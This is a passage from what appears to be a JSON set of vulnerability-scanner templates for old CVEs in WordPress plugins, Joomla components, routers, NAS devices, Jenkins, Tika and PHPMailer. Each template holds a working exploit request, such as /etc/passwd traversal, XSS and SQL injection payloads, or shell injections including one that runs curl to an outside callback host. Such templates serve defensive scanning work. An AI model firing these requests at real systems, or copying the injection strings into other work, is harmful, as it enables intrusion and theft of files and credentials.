application/x-www-form-urlencoded; charset=UTF-8\nCookie: isAdmin=1; username=admin;\n\ncmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n"],"matchers":[{"type":"dsl","dsl":["regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)","contains(body, \"ganalytics\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCodes 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10942","info":{"name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /modules/{{paths}}/file_upload.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818\n\n--ba1f796d0aa2482e9c51c81ae6087818\nContent-Disposition: form-data; name=\"userfile\"; filename=\"{{filename}}.php\"\nContent-Type: multipart/form-data\n\n{{randstr}}\n--ba1f796d0aa2482e9c51c81ae6087818--\n","GET /modules/{{paths}}/file_uploads/{{file}}  HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"paths":["attributewizardpro","1attributewizardpro","attributewizardpro.OLD","attributewizardpro_x"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{{filename}}"]},{"type":"word","part":"body_2","words":["{{randstr}}"]}],"extractors":[{"type":"regex","name":"file","part":"body_1","internal":true,"group":1,"regex":["(.*?)\\|\\|\\|\\|"]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-15917","info":{"name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\nHost: {{Hostname}}\n","GET /session/login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","_jorani"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10736","info":{"name":"NagiosXI <= 5.4.12 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["PhotoXhibit","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["S3 Video Plugin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= 